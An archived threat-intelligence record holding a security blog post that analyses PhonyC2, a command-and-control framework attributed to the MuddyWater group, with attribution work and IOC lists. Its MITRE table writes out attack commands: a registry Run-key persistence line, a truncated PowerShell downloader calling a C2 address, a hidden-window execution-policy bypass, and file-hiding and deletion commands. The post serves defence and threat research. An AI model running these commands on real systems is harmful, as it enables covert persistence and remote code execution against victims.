{ "id": "7a04c5db-a9b5-4c32-bcec-904c68e92af8", "created_at": "2026-04-06T00:10:34.864899Z", "updated_at": "2026-04-10T03:34:22.4835Z", "deleted_at": null, "sha1_hash": "ed10a313a617e03120050d08eee67f2644a88608", "title": "PhonyC2: Revealing a New Malicious Command \u0026 Control Framework by MuddyWater | Deep Instinct", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3325997, "plain_text": "PhonyC2: Revealing a New Malicious Command \u0026 Control Framework\r\nby MuddyWater | Deep Instinct\r\nBy Simon KeninThreat Intelligence ResearcherDeep Instinct Threat Lab\r\nPublished: 2023-06-29 · Archived: 2026-04-02 12:41:33 UTC\r\nMuddyWater, also known as Mango Sandstorm (Mercury), is a cyber espionage group that is a subordinate element within\r\nthe Iranian Ministry of Intelligence and Security (MOIS).\r\nExecutive summary:\r\nDeep Instinct’s Threat Research team has identified a new C2 (command \u0026 control) framework\r\nThe C2 framework is custom made, continuously in development, and has been used by the MuddyWater group since\r\nat least 2021\r\nThe framework is named PhonyC2 and was used in the attack on the Technion Institute\r\nPhonyC2 is currently used in an active PaperCut exploitation campaign by MuddyWater\r\nPhonyC2 is similar to MuddyC3, a previous C2 framework created by MuddyWater\r\nMuddyWater is continuously updating the PhonyC2 framework and changing TTPs to avoid detection, as can be seen\r\nthroughout the blog and in the investigation of the leaked code of PhonyC2. MuddyWater uses social engineering as its’\r\nprimary initial access point so they can infect fully patched systems. Organizations should continue to harden systems and\r\nmonitor for PowerShell activity.\r\nBackground\r\nIn April 2023, Deep Instinct’s threat research team identified three malicious PowerShell scripts that were part of an archive\r\ncalled PhonyC2_v6.zip\r\nNote: V6 is the name of the folder found on the server. Since this is not an official C2 framework, there is no changelog and\r\nversion history. The framework has been changed over time, but we don't know the internal version numbers. Therefore, we\r\nrefer to other versions by unique identifiers rather than version numbers.\r\nThe filename piqued our interest and we set out to discover if it was a known C2 framework. After a quick investigation, it\r\nwas revealed that the C2 framework was found by Sicehice in a server with an open directory listing.\r\nFigure 1: Image of files located on the server\r\nFigure 1: Image of files located on the server\r\nNote: Sicehice is an organization that automates the collection of cyber threat intelligence from over 30 sources and enables\r\nusers to search against the collected IPs.\r\nThere was no previous information regarding PhonyC2 and as the zip file contained the source code, we decided to analyze\r\nthe code to further understand this C2 framework.\r\nOur initial investigation revealed that the server which hosted the C2 is related to infrastructure that was used by\r\nMuddyWater in the attack against the Technion.\r\nFurther research revealed additional connections to MuddyWater infrastructure including the ongoing PaperCut exploitation\r\nand previous attacks using earlier versions of the C2 framework.\r\nExposed Server Analysis\r\nIn addition to the zip file of the PhonyC2, Sicehice uploaded additional files found on the server, including the\r\n“.bash_history” file which revealed the commands the threat actors ran on the server:\r\nFigure 2: Start of .bash_history file\r\nFigure 2: Start of .bash_history file\r\nhttps://www.deepinstinct.com/blog/phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater\r\nPage 1 of 11\n\nFigure 3: End of .bash_history file\r\nIn figure 1 we can see the presence of “Ligolo,” another tool that is known to be used by MuddyWater.\r\nIn figure 2, commands related to PhonyC2 are marked in red.\r\nIn figure 2 and figure 3 marked in blue are additional IP addresses that the threat actor used. Both addresses are mentioned\r\nas C2 servers in the report Microsoft published about their findings from the Technion attack, which they attributed to\r\nMuddyWater.\r\nOpen-source tools are marked in orange; FRP is known to be used by several Iranian threat groups and Chisel is only known\r\nto be used by MuddyWater, but this does not mean it’s exclusive.\r\nAdditionally, in Figure 3, we can see another tunneling tool named “bore” that has not previously been reported to be in use\r\nby MuddyWater.\r\nThe combination of the presence of known MuddyWater tools on the server and the fact that the threat actor communicated\r\nwith two IP addresses known to be used by MuddyWater raised suspicion that PhonyC2 is a framework used by\r\nMuddyWater.\r\nTaking a Closer Look: Code Analysis\r\nTo better understand the Phony C2 framework, we looked at the source code. As we can see in figure 2 above the first file of\r\ninterest is “Please_Run_Once.py:”\r\nFigure 4: Please_Run_Once.py code\r\nFigure 4: Please_Run_Once.py code\r\nThe script creates a unique config file where the IP address, the port that the C2 framework listens to for connections, and an\r\nextension for a decoy must be specified, as seen in line 5 in figure 4. Additionally, the script will add to the config.py file\r\nrandom UUIDs (Universal Unique Identifiers), which makes tracking the URLs of the C2 framework less trivial.\r\nAn example of config.py file:\r\nFigure 5: Example of config.py with random UUID in lines 13-20\r\nFigure 5: Example of config.py with random UUID in lines 13-20\r\nFigure 6: Additional information from config.py\r\nIn figure 6 the config file contains various PowerShell commands, which are different payloads that are used by the\r\nframework.\r\nThe main.py file is small and starts a multi-threaded webserver and a command line listener. From this code we see that the\r\nname “PhonyC2” is used internally:\r\nFigure 7: main.py contents\r\nFigure 7: main.py contents\r\nThe webserver.py is responsible for serving the C2 framework payloads:\r\nFigure 8: Part of webserver.py code\r\nFigure 8: Part of webserver.py code\r\nFigure 8 shows the remnants from previous iterations of the framework in the commented-out route names which have been\r\nreplaced in this iteration of the framework with the random UUID in the config.py file (lines 13-20 in Figure 5)\r\nCommandline.py receives commands from the operator and prints the output of various actions taken by the C2:\r\nFigure 9: Part of commandline.py\r\nhttps://www.deepinstinct.com/blog/phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater\r\nPage 2 of 11\n\nFigure 9: Part of commandline.py\r\nFigure 9 and Figure 5 the code of a file named “C:\\programdata\\db.sqlite” and “db.ps1.” Both of those files are mentioned\r\nwith the same name and path in Microsoft’s report about the Technion hack.\r\nWhile the malicious files from Microsoft’s report are not publicly available for inspection, the combination of the IP\r\naddresses related to PhonyC2 appearing in Microsoft’s report with those file names makes a strong argument that the Phony\r\nC2 framework was used in the attack on the Technion. Additionally, the files created by the C2 framework are detected as\r\n“PowerShell/Downloader.SB,” the same detection name Microsoft used in their blog.\r\nSince both files are dynamically generated by the C2 framework, they are slightly different in each execution of the\r\nframework, therefore, blocking the hashes Microsoft provided is not exhaustive.\r\nHow It Works\r\nFigure 10: PhonyC2 commands\r\nFigure 10: PhonyC2 commands\r\nWhile it might look like there are many options and outputs, the C2 is actually simple if we understand what the code does.\r\nThis C2 is a post-exploitation framework used to generate various payloads that connect back to the C2 and wait for\r\ninstructions from the operator to conduct the final step of the “Intrusion Kill Chain.”\r\n\"payload” Command:\r\nFigure 11: “payload” command output\r\nFigure 11: “payload” command output\r\nIn figure 11 we see a step-by-step explanation of what happens:\r\n1. PowerShell command creates a http request to the C2 to receive an encoded file and save it as\r\n“c:\\programdata\\db.sqlite”\r\n2. PowerShell command writes the base64 decoded content to “c:\\programdata\\db.ps1”\r\nFigure 12: The content of the db.ps1\r\nFigure 12: The content of the db.ps1\r\n3. PowerShell command executes db.ps1 which in turn reads and decodes db.sqlite and executes the result in memory.\r\nEssentially, this is a one-liner to execute on a compromised host so it will beacon back to the C2.\r\nExample Decode Routine\r\nAs previously mentioned, the files generated by the C2 are slightly different each time, however, the decoding logic remains\r\nmostly the same.\r\nBelow is an example of db.sqlite content and a diagram explaining the decoding routine:\r\nFigure 13: HTML response from C2 server for step #1\r\nFigure 14: Decode routine flow (values might change in different executions)\r\nFigure 14: Decode routine flow (values might change in different executions)\r\nhttps://www.deepinstinct.com/blog/phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater\r\nPage 3 of 11\n\n“dropper” Command:\r\nThis command creates different variants of PowerShell commands only for step (1).\r\nFigure 15: “dropper” command output\r\nFigure 15: “dropper” command output\r\n“Ex3cut3” Command:\r\nThis command creates different variants of PowerShell commands for both step (2) and (3) combined:\r\nFigure 16: “Ex3cut3” command output\r\nFigure 16: “Ex3cut3” command output\r\n\"list” Command:\r\nThe list command shows all the connected computers to the C2 with some associated information:\r\nFigure 17: “list” command output\r\nFigure 17: “list” command output\r\n\"setcommandforall” Command:\r\nThis command is the most important one, as it allows the threat actor to execute the same command on all the connected\r\ncomputers at the same time. For example, a command that will download and execute a ransomware payload.\r\nFigure 18: “setcommandforall” command output\r\nFigure 18: “setcommandforall” command output\r\n\"use” Command:\r\nThis command allows the threat actor to get a PowerShell shell on a specific computer:\r\nFigure 19: “use” command output\r\nFigure 19: “use” command output\r\nIf the “use” command is selected, additional commands become available:\r\nFigure 20: Additional command options after selecting “use”\r\nFigure 20: Additional command options after selecting “use”\r\n\"persist” and Other Commands:\r\nMost of these additional commands are self-explanatory, the only interesting one is “persist”\r\nFigure 21: “persist” command output\r\nThe “persist” command is used to generate a PowerShell code to enable the operator to gain persistence on the infected host\r\nso it will connect back to the C2 if the infected host is restarted.\r\nAdditionally, when the operator executes the “persist” command it writes an encrypted payload to a pre-defined random\r\nregistry path in “HKLM\\Software.” This can be partially seen in commandline.py (figure 22), as some of the values are\r\nstored in config.py.\r\nThe encrypted payload is a slightly modified version of “persist_payload_2022.ps1” that triggered the entire investigation.\r\nFigure 22: Code related to persistence from commandline.py\r\nFigure 22: Code related to persistence from commandline.py\r\nBelow is the full chain used to achieve persistence by PhonyC2:\r\nBy executing “persist” on a machine connected to PhonyC2 the C2 writes encrypted payload to the registry\r\nAdd a registry key to the Windows registry that runs a script file named utils.jse located in the C:\\intel\\utils\\ directory\r\nat startup\r\nCreate the directory c:\\intel\\utils\\ if it does not exist\r\nChange the current directory to c:\\intel\\utils\\\r\nDecode a base64 blob and write it into utils.jse\r\nFigure 23: Contents of utils.jse (some values change in each execution)\r\nFigure 23: Contents of utils.jse (some values change in each execution)\r\nhttps://www.deepinstinct.com/blog/phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater\r\nPage 4 of 11\n\nCreate a registry key with random name (fmoopWgmBla) at HKLM:\\\\SOFTWARE\\\\\u003crandom\u003e (iCXqExISMHV)\r\nwith content similar to below:\r\nFigure 24: Content written to the registry with analysis comments\r\nFigure 24: Content written to the registry with analysis comments\r\nWhen the computer is rebooted, the run key causes the execution of the utils.jse script\r\nThe utils.jse script reads and executes the contents from the registry as seen in figure 23\r\nThe PowerShell code in figure 25 connects to the C\u0026C server to receive and execute a code that is similar to the\r\nbelow:\r\nFigure 25: Input is base64 returned from the server\r\nFigure 25: Input is base64 returned from the server\r\nThe base64 decoded script is reading and decrypting another payload from the registry. This payload is based on\r\n“persist_payload_2022.ps1.”\r\nInfection Flow\r\nFigure 26: Infection flow of PhonyC2\r\nAttribution\r\nThe current version of PhonyC2 is written in Python3. It is structurally and functionally similar to MuddyC3, a previous\r\nMuddyWater custom C2 framework that was written in Python2.\r\nhttps://www.deepinstinct.com/blog/phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater\r\nPage 5 of 11\n\nFigure 27: MuddyC3 output, see figure 10; similarities with PhonyC2\r\nWith the knowledge we gathered from investigating the source code of PhonyC2 we believe that PhonyC2 is a successor to\r\nMuddyC3 and POWERSTATS.\r\nWe investigated prior MuddyWater intrusions to identify when PhonyC2 was first used and we found that on November 29,\r\n2021, the IP address 87.236.212[.]22 responded with obfuscated payload which we believe is an early variant of Phony C2\r\nwritten in Python2. For proof, we can see comments left in figure 4 by the threat actor requesting code changes for the script\r\nto work with Python3.\r\nThe obfuscated payload was saved to a file named “data.sqlite” which is remarkably similar to the file name used in\r\nPhonyC2. In addition, the obfuscated payload has the same comma separated delimiter that is in the current PhonyC2\r\npayloads, and the decoding routine is different from the most recent one.\r\nIn figures 6 and 8 the string “apiy7” is commented out in the code. We found a submission of a URL from March 2022\r\ncontaining that string, meaning this was a PhonyC2 server, but with an earlier version than the current V6 that is described\r\nin this blog.\r\nThe IP address of this URL is 137.74.131[.]30. It is mentioned in the Group-IB report as having \"ETag 2aa6-\r\n5c939a3a79153.\"\r\n178.32.30[.]3 is another IP address that had both the “apiy7” string and \"ETag 2aa6-5c939a3a79153.\" It is also referenced in\r\na blog by Talos detailing MuddyWater activity, published in March. However, we can’t confirm if the activity is related to\r\nPhonyC2. The first confirmation of PhonyC2 on this server is a URL scan from August which contained the “apiy7” string.\r\nThe same IP address had another scan in August, which revealed a custom error message that revealed additional PhonyC2\r\nservers. Pivoting from those additional servers, we were able to find additional PhonyC2 servers with the string “apiv4”\r\nfrom March 2022 through May 2022 that pre-date the “apiy7” PhonyC2 version.\r\nThe IP address 91.121.240[.]104 contained both “apiy7” string and \"ETag 2aa6-5c939a3a79153.\" It was confirmed by\r\nMicrosoft as an IP address used by MuddyWater to exploit the log4j vulnerability in the Israeli SysAid software, confirming\r\nthat the PhonyC2 was used in those attacks as well.\r\nDuring our research we uncovered PhonyC2 servers with different ETag values or no ETag at all. We suspect that the\r\noccurrence of servers with same ETag value originate from duplication of the server image by the VPS provider. Therefore,\r\nthis method might work occasionally but will be of value mostly for historical purposes.\r\nAs we mentioned in the “Server Analysis” section, in Figure 2 and Figure 3 are two IP addresses. 194.61.121[.]86 and\r\n45.86.230[.]20 that were confirmed by Microsoft as MuddyWater’s C2 servers used in the Technion hack. While we can’t\r\nconfirm whether 45.86.230[.]20 was running PhonyC2, both 46.249.35[.]243 and 194.61.121[.]86 that are listed in\r\nMicrosoft’s report were hosting PhonyC2 V6 based on URL patterns that we have seen in the python source code.\r\nAnother interesting commonality we have observed in MuddyWater’s operations is the use of “core.” In MuddyC3 there is a\r\ndirectory named “core” and in PhonyC2 there is a directory called “isnotcore.” “core” is also referenced several times in the\r\ncode (see figures 4-8). From our analysis, the PowGoop C2 servers had URL pattern of “Core?Token=.” We suspect that one\r\nof the servers, 164.132.237[.]79, running PowGoop, might be still controlled by MuddyWater. This IP is currently running\r\nMetasploit server, which MuddyWater is known to use.\r\nPassive DNS resolution of this IP is showing the domain 6nc110821hdb[.]co. This domain was also resolving to two other\r\nPowGoop servers:\r\nhttps://www.deepinstinct.com/blog/phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater\r\nPage 6 of 11\n\nFigure 28: Passive DNS resolution for 6nc110821hdb[.]co\r\nBoth of those servers, 51.255.19[.]178 and 51.255.19[.]179, were hosting SimpleHelp according to Group-IB. Group-IB\r\nalso listed many IPs from the 164.132.237.64/28 subnet as SimpleHelp servers, which makes it obvious that\r\n164.132.237[.]79 is somehow related to MuddyWater activity as well. The 6nc110821hdb[.]co domain name was looking\r\nrather suspicious and after further investigation we have found an interesting pattern:\r\n\u003c3 letters\u003e\u003c1 digit\u003e[dot]6nc\u003cdate\u003e\u003coptional 2 letters\u003e\u003coptional incremented letter\u003e[dot]co\r\nWe detected the following domain names that still have active hosts with passive DNS resolving.\r\n6nc051221a[.]co\r\n6nc051221c[.]co\r\n6nc110821hdb[.]co\r\n6nc060821[.]co\r\n6nc220721[.]co\r\nWe suspect that those domains represent infrastructure registered in 2021 by MuddyWater that are still active today.\r\nThere are additional domains where we did not find active infrastructure, such as 6nc051221b[.]co and 6nc110821hda[.]co.\r\nIn the past, the latter was resolving to known MuddyWater infrastructure. “6nc” could be interpreted as C\u0026C (Six and C),\r\nwhich is an abbreviation to “Command and Control.”\r\nAt the beginning of May 2023, Microsoft’s Twitter post mentioned they had observed MuddyWater exploiting CVE-2023-\r\n27350 in the PaperCut print management software. While they did not share any new indicators, they noted that\r\nMuddyWater was “using tools from prior intrusions to connect to their C2 infrastructure” and referenced their blog on the\r\nTechnion hack – which we already established was using PhonyC2. About the same time Sophos published indicators from\r\nvarious PaperCut intrusions they have seen. Deep Instinct found that two IP addresses from those intrusions are PhonyC2\r\nservers based on URL patterns.\r\n1) 185.254.37[.]173\r\nThis IP address was also hosting various payloads. While we could not retrieve most of them, we were able to capture the\r\ndirectory listing of the server in Censys.\r\nhttps://www.deepinstinct.com/blog/phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater\r\nPage 7 of 11\n\nFigure 29: Directory listing of 185.254.37[.]173\r\nThe file named eh.msi was uploaded to VirusTotal. This file is an installer for the eHorus remote access tool. The exact same\r\nfile was also mentioned by Mandiant as being used by a cluster of activity that overlaps with MuddyWater. Additionally, the\r\nuse of eHorus software by MuddyWater was observed by Microsoft and Symantec.\r\n2) 45.159.248[.]244\r\nIn this instance of PhonyC2, MuddyWater decided to use Port 53 for the server, which is normally reserved for DNS use.\r\nThis shows yet another attempt by MuddyWater to change their TTPs and conceal their malicious activity.\r\nThis is also the third overlap of PhonyC2 intersecting with Microsoft’s reporting on MuddyWater activity.\r\nLooking Ahead\r\nMuddyWater is continuously updating the C2 and changing TTPs to avoid detection, as can be seen throughout the blog, and\r\nin the investigation of the leaked code of PhonyC2.\r\nDeep Instinct has already observed a suspected instance of PhonyC2 that is using a newer code version than V6 that was\r\nleaked in a URL scan on the IP 195.20.17[.]44:\r\nFigure 30: URL Scan of newer than V6 PhonyC2\r\nThe part of the URL that is marked in red has been changed since PhonyC2 V6, the use of UUIDs has been changed, and the\r\n“go” extension was added. The second part of the URL in green has not been changed from the V6 code.\r\nThe response to this scan is the following payload.\r\nhttps://www.deepinstinct.com/blog/phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater\r\nPage 8 of 11\n\nFigure 31: New PhonyC2 payload (see Figure 13 reference)\r\nWhile the encoded payload (green) looks similar to what we have seen in V6, MuddyWatter added a benign HTML code\r\n(red) to further conceal their activities. In PhonyC2 V6, the server response was solely the encoded payload without any\r\nHTML. Furthermore, the server’s location of the IP address 195.20.17[.]44 is in Israel, and we suspect this location was\r\nchosen on purpose to conceal network traffic in a targeted attacks against Israeli organizations.\r\nWhile examining the subnet 195.20.17.0/24 of this newer PhonyC2 server we have observed many IP addresses that are\r\nrelated to cybercrime. However, one of the IP addresses 195.20.17[.]183 had a passive DNS response of\r\nam1211.iransos[.]me. While we cannot confirm this IP address is related to MuddyWater, we suspect that the whole subnet\r\nis leased to some Iranian VPS provider used by MuddyWater.\r\nYou can find the source code of PhonyC2 and the IOCs in our GitHub page.\r\nMITRE:\r\nTactic Technique Description Observable\r\nCommand\r\nand\r\nControl\r\nT1071.001\r\nApplication\r\nLayer\r\nProtocol:\r\nWeb\r\nProtocols\r\nPhony C2 uses\r\nHTTP to\r\ndownload\r\nobfuscated\r\npayload\r\nhttp://46.249.35[.]243:443/9b22685e-f173-4feb-95a4-c63daaf40c58.html?X9GFTRD6OZE=X9GFTR\r\nT1132.002\r\nData\r\nEncoding:\r\nNon-Standard\r\nEncoding\r\nPhony C2\r\npayload is\r\nobfuscated\r\nusing a custom\r\nencoding\r\n,15555554155555554,14((1414,1554(14(,1554(14(,15415554,1554(14(,1414(,154((154,154154((,155\r\nT1105\r\nIngress\r\nTool\r\nTransfer\r\nPhony C2 has\r\nthe ability to\r\ndownload\r\npayloads from\r\nthe C2 server\r\nhttp://46.249.35[.]243:443/9b22685e-f173-4feb-95a4-c63daaf40c58.html?X9GFTRD6OZE=X9GFTR\r\nPersistence\r\nT1547.001\r\nBoot or\r\nLogon\r\nAutostart\r\nExecution:\r\nRegistry\r\nRun Keys /\r\nStartup\r\nFolder\r\nPhony C2 has\r\nthe ability to\r\nadd persistence\r\nmechanisem\r\nreg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v NEW /d C:\\intel\\utils\\utils.jse /f\r\nExecution\r\nT1059.001\r\nCommand\r\nand\r\nScripting\r\nInterpreter:\r\nPowerShell\r\nPhony C2 is\r\nexecuted by\r\nPowerShell and\r\nis executing\r\nPowerShell\r\ncommands\r\npowershell Start-Job -ScriptBlock {Invoke-WebRequest -UseDefaultCredentials -UseBasicParsing -U\r\nDefense\r\nEvasion\r\nT1564.001\r\nHide\r\nArtifacts:\r\nHidden\r\nFiles and\r\nDirectories\r\nPhony C2 is\r\nsetting hidden\r\nattribute to files\r\nin\r\nC:\\ProgramData\r\nattrib +h c:\\programdata\\db.sqlite\r\nhttps://www.deepinstinct.com/blog/phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater\r\nPage 9 of 11\n\nTactic Technique Description Observable\r\nT1564.003\r\nHide\r\nArtifacts:\r\nHidden\r\nWindow\r\nPhony C2 is\r\nexecuted to hide\r\nthe PowerShell\r\nwindow\r\npowershell -EP BYPASS -NoP -W 1\r\nT1070.004\r\nIndicator\r\nRemoval:\r\nFile\r\nDeletion\r\nPhony C2\r\ndeletes files\r\nafter execution\r\nrm c:\\programdata\\db.sqlite ; rm c:\\programdata\\db.ps1\r\nT1112\r\nModify\r\nRegistry\r\nPhonyC2\r\ncreates registry\r\nentries to\r\nachieve\r\npersistence\r\nNew-ItemProperty -Path \"HKLM:SOFTWARE\\iCXqExISMHV\" -Name \"fmoopWgmBla\" -Value '$p\r\nIOC:\r\nIP Address Description\r\n45.159.248[.]244 PhonyC2 V6 (PaperCut)\r\n91.121.240[.]104 \"apiy7\" PhonyC2 with ETag 2aa6-5c939a3a79153 (log4j)\r\n195.20.17[.]44 Suspected as PhonyC2 V7\r\n45.86.230[.]20 MuddyWater infrastructure related to PhonyC2 activity (DarkBit Technion)\r\n137.74.131[.]30 \"apiy7\" PhonyC2 with ETag 2aa6-5c939a3a79153\r\n178.32.30[.]3 \"apiy7\" PhonyC2\r\n137.74.131[.]24 \"apiv4\" and/or \"apiy7\" PhonyC2 with ETag 2aa6-5c939a3a79153\r\n46.249.35[.]243 PhonyC2 V6 (DarkBit Technion)\r\n185.254.37[.]173 PhonyC2 V6 (PaperCut)\r\n194.61.121[.]86 PhonyC2 V6 (DarkBit Technion)\r\n87.236.212[.]22 Suspected first version of PhonyC2\r\n91.235.234[.]130 PhonyC2 V6.zip\r\n157.90.153[.]60 \"apiv4\" PhonyC2\r\n157.90.152[.]26 \"apiv4\" PhonyC2\r\n65.21.183[.]238 \"apiv4\" PhonyC2\r\n45.132.75[.]101 Suspected MuddyWater infrastructure (edc1.6nc051221c[.]co)\r\n51.255.19[.]178 Suspected MuddyWater infrastructure (pru2.6nc110821hdb[.]co)\r\n103.73.65[.]129 Suspected MuddyWater infrastructure (nno1.6nc060821[.]co)\r\n103.73.65[.]225 Suspected MuddyWater infrastructure (nno3.6nc060821[.]co)\r\n103.73.65[.]244 Suspected MuddyWater infrastructure (kwd1.6nc220721[.]co)\r\n103.73.65[.]246 Suspected MuddyWater infrastructure (kwd2.6nc220721[.]co)\r\n103.73.65[.]253 Suspected MuddyWater infrastructure (kwd3.6nc220721[.]co)\r\n137.74.131[.]16 Suspected MuddyWater infrastructure (qjk1.6nc051221c[.]co)\r\n137.74.131[.]18 Suspected MuddyWater infrastructure (qjk2.6nc051221c[.]co)\r\n137.74.131[.]25 Suspected MuddyWater infrastructure (qjk3.6nc051221c[.]co)\r\n164.132.237[.]67 Suspected MuddyWater infrastructure (tes2.6nc051221a[.]co)\r\nhttps://www.deepinstinct.com/blog/phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater\r\nPage 10 of 11\n\nIP Address Description\r\n164.132.237[.]79 Suspected MuddyWater infrastructure (pru1.6nc110821hdb[.]co)\r\nSamples of files generated by the framework (those are non-exhaustive):\r\nSHA256 Description\r\n7cb0cc6800772e240a12d1b87f9b7561412f44f01f6bb38829e84acbc8353b9c db.ps1\r\n5ca26988b37e8998e803a95e4e7e3102fed16e99353d040a5b22aa7e07438fea db.sqlite\r\n1c95496da95ccb39d73dbbdf9088b57347f2c91cf79271ed4fe1e5da3e0e542a utils.jse\r\n2f14ce9e4e8b1808393ad090289b5fa287269a878bbb406b6930a6c575d1f736 db.ps1\r\nb4b3c3ee293046e2f670026a253dc39e863037b9474774ead6757fe27b0b63c1 db.sqlite\r\nb38d036bbe2d902724db04123c87aeea663c8ac4c877145ce8610618d8e6571f utils.jse\r\nSource: https://www.deepinstinct.com/blog/phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater\r\nhttps://www.deepinstinct.com/blog/phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://www.deepinstinct.com/blog/phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater" ], "report_names": [ "phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater" ], "threat_actors": [ { "id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b", "created_at": "2022-10-25T15:50:23.308924Z", "updated_at": "2026-04-10T02:00:05.298591Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "MuddyWater", "Earth Vetala", "Static Kitten", "Seedworm", "TEMP.Zagros", "Mango Sandstorm", "TA450" ], "source_name": "MITRE:MuddyWater", "tools": [ "STARWHALE", "POWERSTATS", "Out1", "PowerSploit", "Small Sieve", "Mori", "Mimikatz", "LaZagne", "PowGoop", "CrackMapExec", "ConnectWise", "SHARPSTATS", "RemoteUtilities", "Koadic" ], "source_id": "MITRE", "reports": null }, { "id": "2ed8d590-defa-4873-b2de-b75c9b30931e", "created_at": "2023-01-06T13:46:38.730137Z", "updated_at": "2026-04-10T02:00:03.08136Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "TEMP.Zagros", "Seedworm", "COBALT ULSTER", "G0069", "ATK51", "Mango Sandstorm", "TA450", "Static Kitten", "Boggy Serpens", "Earth Vetala" ], "source_name": "MISPGALAXY:MuddyWater", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "156b3bc5-14b7-48e1-b19d-23aa17492621", "created_at": "2025-08-07T02:03:24.793494Z", "updated_at": "2026-04-10T02:00:03.634641Z", "deleted_at": null, "main_name": "COBALT ULSTER", "aliases": [ "Boggy Serpens ", "ENT-11 ", "Earth Vetala ", "ITG17 ", "MERCURY ", "Mango Sandstorm ", "MuddyWater ", "STAC 1171 ", "Seedworm ", "Static Kitten ", "TA450 ", "TEMP.Zagros ", "UNC3313 ", "Yellow Nix " ], "source_name": "Secureworks:COBALT ULSTER", "tools": [ "CrackMapExec", "Empire", "FORELORD", "Koadic", "LaZagne", "Metasploit", "Mimikatz", "Plink", "PowerStats" ], "source_id": "Secureworks", "reports": null }, { "id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb", "created_at": "2022-10-25T16:07:23.880522Z", "updated_at": "2026-04-10T02:00:04.775749Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "ATK 51", "Boggy Serpens", "Cobalt Ulster", "G0069", "ITG17", "Mango Sandstorm", "MuddyWater", "Operation BlackWater", "Operation Earth Vetala", "Operation Quicksand", "Seedworm", "Static Kitten", "T-APT-14", "TA450", "TEMP.Zagros", "Yellow Nix" ], "source_name": "ETDA:MuddyWater", "tools": [ "Agentemis", "BugSleep", "CLOUDSTATS", "ChromeCookiesView", "Cobalt Strike", "CobaltStrike", "CrackMapExec", "DCHSpy", "DELPHSTATS", "EmPyre", "EmpireProject", "FruityC2", "Koadic", "LOLBAS", "LOLBins", "LaZagne", "Living off the Land", "MZCookiesView", "Meterpreter", "Mimikatz", "MuddyC2Go", "MuddyRot", "Mudwater", "POWERSTATS", "PRB-Backdoor", "PhonyC2", "PowGoop", "PowerShell Empire", "PowerSploit", "Powermud", "QUADAGENT", "SHARPSTATS", "SSF", "Secure Socket Funneling", "Shootback", "Smbmap", "Valyria", "chrome-passwords", "cobeacon", "prb_backdoor" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434234, "ts_updated_at": 1775792062, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/ed10a313a617e03120050d08eee67f2644a88608.pdf", "text": "https://archive.orkl.eu/ed10a313a617e03120050d08eee67f2644a88608.txt", "img": "https://archive.orkl.eu/ed10a313a617e03120050d08eee67f2644a88608.jpg" } }